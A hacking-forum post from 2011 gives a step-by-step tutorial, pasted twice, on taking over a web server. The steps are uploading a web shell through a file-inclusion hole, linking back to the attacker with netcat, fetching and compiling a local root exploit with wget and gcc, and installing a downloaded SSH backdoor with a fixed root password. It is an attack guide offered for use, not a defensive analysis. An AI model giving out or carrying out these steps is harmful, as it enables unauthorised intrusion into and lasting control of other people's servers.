Rooting a Web Server 07-21-2011, 02:22 PM
#1
Hello. In this tutorial i will show you how to Root a WebServer.
For this tutorial greetz to CyberCode...
Start
- - - - - - - - - - - - - -
First you must some uploaded Shell on site...
If you don't have, go and find some RFI vuln site, and upload shell and back to here...
- - - - - - - - - - - - -
Make connection from the shell to the our PC...
Type our Ip,port,etc..
Open the Terimian and type:
nc -l -n -v -p 8080
the type :
nc victimsIp 8080
Then we type:
uname -a;id
We will get some info about website..
When we get it try to find some exploit for that server, you will get info like this :
Type in terminal:
wget http://www.linkexploita.com/xpl.c
This is exploit in C, and we must to make it usefoul for all users..
Type in terminal :
gcc xpl.c -o xpl;chmod +x xpl
We must start it typr it :
./xpl
When wwe started the script typr in terminal :
whoami
Then we get something like this :
uid=0(root) gid=0(root) groups=450(apache)
ok..This will be it, but i want to go for more.
Set up a SSH backdoor..
http://www.pacenoge.org/tool/sshdoor.tar.gz
install this :
./install pass port
this will be like this :
./install hackcomunity 33
hen type :
open putty
Then:
ssh port : 33 login : root password : hackcomunity
Then we get the finaly command for the server:
Then we type:
uname -a;id
If it is works then we get :
Linux something likethis.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- - - - - - - - - - -
That all...
We got a rooted server..
See you next time ...
#################################################
##################~tut by KaiT_AleX~##################
#################################################
For this tutorial greetz to CyberCode...
Start
- - - - - - - - - - - - - -
First you must some uploaded Shell on site...
If you don't have, go and find some RFI vuln site, and upload shell and back to here...
- - - - - - - - - - - - -
Make connection from the shell to the our PC...
Type our Ip,port,etc..
Open the Terimian and type:
nc -l -n -v -p 8080
the type :
nc victimsIp 8080
Then we type:
uname -a;id
We will get some info about website..
When we get it try to find some exploit for that server, you will get info like this :
Quote:Linux something likethis.com 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Type in terminal:
wget http://www.linkexploita.com/xpl.c
This is exploit in C, and we must to make it usefoul for all users..
Type in terminal :
gcc xpl.c -o xpl;chmod +x xpl
We must start it typr it :
./xpl
When wwe started the script typr in terminal :
whoami
Then we get something like this :
uid=0(root) gid=0(root) groups=450(apache)
ok..This will be it, but i want to go for more.
Set up a SSH backdoor..
http://www.pacenoge.org/tool/sshdoor.tar.gz
install this :
./install pass port
this will be like this :
./install hackcomunity 33
hen type :
open putty
Then:
ssh port : 33 login : root password : hackcomunity
Then we get the finaly command for the server:
Then we type:
uname -a;id
If it is works then we get :
Linux something likethis.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- - - - - - - - - - -
That all...
We got a rooted server..
See you next time ...
#################################################
##################~tut by KaiT_AleX~##################
#################################################
![[Image: 1308031172619.gif?w=356&h=140]](http://thechive.files.wordpress.com/2011/06/1308031172619.gif?w=356&h=140)
Don't learn to hack, hack to learn.
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
